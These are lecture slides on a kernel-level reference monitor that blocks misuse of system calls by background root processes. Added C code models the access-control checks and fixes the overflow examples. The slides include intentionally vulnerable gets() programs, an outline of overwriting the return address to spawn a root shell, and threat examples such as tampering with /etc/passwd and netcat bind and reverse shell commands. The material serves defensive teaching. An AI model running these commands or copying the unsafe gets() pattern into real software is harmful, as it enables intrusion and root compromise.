Operating System enhancements to prevent misuse of System Calls
Dayal Dilli
ddilli@unb.ca
March 25, 2013
Outline
• Operating system security vulnerabilities and concepts
• Buffer overflow exploit
• Misuse of system calls and kernel data structures
• Access control databases, audit files and reference monitors
• Performance evaluation with the protection mechanism
Operating System Security
• Protect the system from executing unauthorized code.
  – Prevent unauthorized execution of kernel code, e.g. via a system call.
  – Protect critical memory areas from corruption.
Top Operating System Vulnerabilities
• Buffer Overflow attacks
• Denial of Service attacks
• Viruses and Trojans
Buffer overflow
• A buffer is a region of memory
  – Stack, e.g. local variables such as arrays
  – Heap, e.g. dynamically allocated memory
Stack Overflow
#include <stdio.h>

int main(void)
 {
 char buffer[10]; //Stack
 gets(buffer);    //no bound check: input longer than 9 bytes overruns buffer
 puts(buffer);
 return 0;
 }
Heap Overflow
#include <stdio.h>
#include <stdlib.h>

int main(void)
 {
 char *buffer;
 buffer=(char *)malloc(10); //Heap
 gets(buffer); //buffer more than 10 bytes overruns the heap allocation
 puts(buffer);
 free(buffer);
 return 0;
 }
Exploiting Stack Overflow
• Make the content of buffer[] overflow.
• Craft the content of buffer[] so that it overwrites RET with the address of the attacker's malicious code.
• Malicious code includes spawning a root shell using exec, binding it to a port using netcat, etc.
Example
• Normal run
  – Buffer[] = 'ABCDEFGH' – runs properly – 8 bytes
• Exploit
  – Buffer[] = 'ABCDEFGHIJKL<address of malicious code>'
  – Malicious code contains system calls like exec that can run a shell.
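The root cause on slides 6 and 7 is that gets() has no idea how large the buffer is. As an added example (not code from the deck or the paper), here are the same two programs with a bounded read: read_line_bounded(), demo_stack(), demo_heap() and the fmemopen-based helpers are names chosen here, and the 8-byte and 12-byte inputs from the Example slide are used as the test inputs. A line that does not fit is rejected and drained rather than allowed to overrun the buffer.

```c
#define _POSIX_C_SOURCE 200809L   /* fmemopen() for the in-memory self-test helpers */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Explicit prototype so the helpers compile even when feature macros were
 * set after a system header was already included (same signature as POSIX). */
FILE *fmemopen(void *buf, size_t size, const char *mode);

/* Read one line into dst without ever writing past dst[cap-1].
 * Returns the number of bytes stored (newline removed), or -1 when the line
 * did not fit; in that case the rest of the line is drained so the caller's
 * next read starts on a clean line instead of the overlong line's tail. */
int read_line_bounded(char *dst, size_t cap, FILE *in) {
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
        return (int)len;
    }
    /* No newline in dst: the input ended, the line filled dst exactly, or the
     * line was longer than cap-1 bytes. One more character tells which. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return (int)len;
    while (c != '\n' && c != EOF)          /* overlong: discard, never overflow */
        c = fgetc(in);
    return -1;
}

/* Slide 6 with the bounded read: the 10-byte stack buffer holds 9 characters. */
int demo_stack(FILE *in) {
    char buffer[10];                       /* stack */
    int n = read_line_bounded(buffer, sizeof buffer, in);
    if (n < 0) {
        puts("rejected: line longer than 9 bytes");
        return -1;
    }
    puts(buffer);
    return n;
}

/* Slide 7 with the bounded read: the capacity travels with the heap pointer. */
int demo_heap(FILE *in) {
    size_t cap = 10;
    char *buffer = malloc(cap);            /* heap */
    if (buffer == NULL)
        return -1;
    int n = read_line_bounded(buffer, cap, in);
    if (n >= 0)
        puts(buffer);
    else
        puts("rejected: line longer than 9 bytes");
    free(buffer);
    return n;
}

/* Self-test helpers: run the demos on an in-memory stream (constructed input). */
int demo_stack_on(const char *input) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return -2;
    int n = demo_stack(f);
    fclose(f);
    return n;
}
int demo_heap_on(const char *input) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return -2;
    int n = demo_heap(f);
    fclose(f);
    return n;
}

int main(void) {
    /* Reads two lines from stdin: one into the stack buffer, one into the heap buffer. */
    int a = demo_stack(stdin);
    int b = demo_heap(stdin);
    return (a < 0 || b < 0) ? 1 : 0;
}
```

The check that matters is the return value of read_line_bounded(): a negative result means the caller never sees a partially copied line, and the drain loop keeps a long line from being split into a "fitting" prefix and a dangling remainder that the next read would mistake for fresh input.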
What happened in the previous slides?
• Critical memory areas got corrupted.
• We used the exec system call to spawn a shell.
• Apart from this, unprotected access to system calls also leads to resource starvation, causing denial of service attacks.
Prevention of Attacks
• Monitoring of system calls made by processes.
• Blocking malicious system call invocations from completing.
• The paper proposes a mechanism for intercepting system calls at kernel level.
Methodology
• Detect illegal invocation of system calls.
• Reference-monitor the system calls.
• Check the arguments of the system calls.
• Implement a lightweight change with few modifications to the existing kernel data structures and algorithms.
Approach
    • Key Terms:
      –   Reference functions
      –   Authorization functions
      –   Access control Database
      –   Access Control Rules
Kernel Enhancements
• Not all system calls are malicious.
• Identify the subset of system calls to monitor.
• The paper mainly focuses on the prototype implemented to prevent buffer-overflow-based intrusion attacks.
Root Access?
• How to get root access on the system?
  – Exploit any vulnerability (e.g. buffer overflow) in any of the running root processes.
Categories of Root Process
• Interactive
  – Process started by the superuser. Threat level is nil, as the user has full control of the process.
• Background
  – Daemon programs started at boot, cron jobs.
     • e.g. httpd, ftp, mysqld, processes started with '&' at the end.
• Generally, any process with UID and EUID equal to 0.
System Call Categories and Threat Level
Threat Level Classification
• System calls in groups 1–3 come under threat level 1.
• System calls in groups 4–9 are not so malicious when misused.
System calls with threat level 1 and 2
Threat level 1 system calls
Threat examples
• chmod("/etc/passwd", 0666)
  chown("/etc/passwd", intruder, intruder_group)
  rename("/tmp/passwd", "/etc/passwd")
• unlink("/etc/passwd")
  link("/tmp/passwd", "/etc/passwd")
• nc <ip> <port> -e /bin/bash
• nc -l -p <port> -e /bin/bash
Implementation
• New data structures to implement the Access Control Database (ACD).
• A new system call to read, write and update the ACD and the reference functions.
Authorization and Reference functions
• Check for root privilege and the subsequent access to system calls.
Data structures:
• setuid_acd – contains the root password
• execve_acd
  – struct exe_file_id
  – struct executable_file
  – struct executable_file_list
Data Structures
Admitted Data structure
sys_setuid_aclm / aclmng
• System call to read and modify the ACD. Acts as the common front end for all methods on the ACD.
• Only processes with UID and EUID = 0 can access it.
• Handles concurrent access by two root processes using the lock variable write_pid.
sys_setuid_aclm methods
• PUT(exe_file, suid_prog, list)
• DELETE(exe_file, suid_prog, list)
• GET(exe_file, suid_prog, param)
  – param->file_nr, param->prog_nr from param->list
check_rootproc
• Reference function that authenticates the
  execution of execve by a root process.
  – Denial:
     • EXENA: process not in ACD or not authenticated
     • EFNA: File not authenticated
Examples
• setuid(0) / su
  – Checks the password
• chmod / chown
  – Process: background
  – File: any regular file / directory
  – Checks the process and file against the ACD, along with the password.
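The Methodology, check_rootproc and Examples slides describe the reference functions but not their logic, so here is a user-space model in C of that logic, written for this page and not taken from the deck or the paper. It assumes a tiny constructed ACD (three cron/httpd entries), a constructed list of protected files, a plaintext stand-in for the root password that setuid_acd holds, numeric values for the denial codes EXENA and EFNA, an extra code EARGNA for a failed argument/credential check, and a struct proc that stands in for the kernel's per-task data. It also generalizes the chmod/chown example to the other threat-level-1 calls (rename, unlink, link) by checking each path argument.

```c
#include <stdio.h>
#include <string.h>

/* Denial codes named on the slides (EXENA, EFNA). Their numeric values, and
 * EARGNA for a failed argument/credential check, are assumptions of this model. */
enum { ACD_OK = 0, EXENA = 1, EFNA = 2, EARGNA = 3 };

/* execve_acd entry: a root program and one executable it is allowed to execve. */
struct acd_entry { const char *suid_prog; const char *exe_file; };

/* Constructed sample ACD contents; not the paper's data. */
static const struct acd_entry execve_acd[] = {
    { "/usr/sbin/cron",  "/bin/sh"             },
    { "/usr/sbin/cron",  "/usr/sbin/logrotate" },
    { "/usr/sbin/httpd", "/usr/bin/php-cgi"    },
};
#define N_ACD (sizeof execve_acd / sizeof execve_acd[0])

/* Files that the threat-level-1 calls may not touch without an ACD match (constructed list). */
static const char *const protected_files[] = { "/etc/passwd", "/etc/shadow", "/etc/group" };
#define N_PROTECTED (sizeof protected_files / sizeof protected_files[0])

/* setuid_acd holds the root password on the slides; a constructed plaintext
 * secret stands in for it in this model. */
static const char setuid_acd_secret[] = "constructed-demo-secret";

/* Stand-in for the kernel's per-task data: program path, ids, and whether the
 * process is interactive (slide 16: interactive root processes are not monitored). */
struct proc { const char *exe; unsigned uid, euid; int interactive; };

static int monitored(const struct proc *p) {
    return p->uid == 0 && p->euid == 0 && !p->interactive;
}

static int prog_in_acd(const char *prog) {
    for (size_t i = 0; i < N_ACD; i++)
        if (strcmp(execve_acd[i].suid_prog, prog) == 0) return 1;
    return 0;
}

static int pair_in_acd(const char *prog, const char *file) {
    for (size_t i = 0; i < N_ACD; i++)
        if (strcmp(execve_acd[i].suid_prog, prog) == 0 &&
            strcmp(execve_acd[i].exe_file, file) == 0) return 1;
    return 0;
}

static int is_protected(const char *path) {
    for (size_t i = 0; i < N_PROTECTED; i++)
        if (strcmp(protected_files[i], path) == 0) return 1;
    return 0;
}

/* Compare in time independent of where the first mismatching byte is. */
static int secret_matches(const char *given) {
    size_t n = strlen(given), m = sizeof setuid_acd_secret - 1;
    unsigned char diff = (unsigned char)(n != m);
    for (size_t i = 0; i < m; i++)
        diff |= (unsigned char)(setuid_acd_secret[i] ^ (i < n ? given[i] : 0));
    return diff == 0;
}

/* Audit file stand-in: one line per denial on stderr. */
static void audit(const char *call, const struct proc *p, const char *arg, int code) {
    static const char *const names[] = { "OK", "EXENA", "EFNA", "EARGNA" };
    if (code != ACD_OK)
        fprintf(stderr, "audit: deny %s by %s (uid=%u euid=%u) arg=%s reason=%s\n",
                call, p->exe, p->uid, p->euid, arg, names[code]);
}

/* check_rootproc: reference function for execve by a root process. */
int check_rootproc(const struct proc *p, const char *target) {
    int code = ACD_OK;
    if (monitored(p)) {
        if (!prog_in_acd(p->exe))              code = EXENA;  /* process not in ACD */
        else if (!pair_in_acd(p->exe, target)) code = EFNA;   /* file not authenticated */
    }
    audit("execve", p, target, code);
    return code;
}

/* check_file_arg: argument check for chmod/chown/rename/unlink/link on one path;
 * two-path calls (rename, link) run it on both arguments. */
int check_file_arg(const char *call, const struct proc *p, const char *path, const char *secret) {
    int code = ACD_OK;
    if (monitored(p) && is_protected(path)) {
        if (!prog_in_acd(p->exe))         code = EXENA;
        else if (!secret_matches(secret)) code = EARGNA;
    }
    audit(call, p, path, code);
    return code;
}

int main(void) {
    struct proc cron = { "/usr/sbin/cron", 0, 0, 0 };
    printf("cron execve /bin/sh    -> %d\n", check_rootproc(&cron, "/bin/sh"));
    printf("cron execve /bin/bash  -> %d\n", check_rootproc(&cron, "/bin/bash"));
    printf("cron chmod /etc/passwd -> %d\n", check_file_arg("chmod", &cron, "/etc/passwd", ""));
    return 0;
}
```

Two design points carry over to a real kernel hook: the checks only run for background root processes (monitored()), which is what keeps the performance cost to the small subset of calls the Performance slide mentions, and every denial is written to the audit stand-in before the code is returned, so a blocked rename("/tmp/passwd", "/etc/passwd") leaves a record even though it never completes.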
Performance
• Only a limited reduction in performance.
• Reasons:
  – Only 10% of the system calls include an access check.
  – Only a limited number of processes execute all checks.
  – No changes to user-mode processes.
  – All data structures needed for the checks are in kernel memory.
Evaluation
• Pentium II, 330 MHz with 128 MB RAM, Linux
  Kernel Version 2.2.12.
Related Works and Conclusion
• Linker warning for dangerous function calls, e.g. gets, strcpy.
• Non-executable stack.
• StackGuard in gcc – commercial tool that prevents return address modification using a canary word.
• StackShield in gcc – moves the return address to a non-overflowable location, e.g. the beginning of the data section.
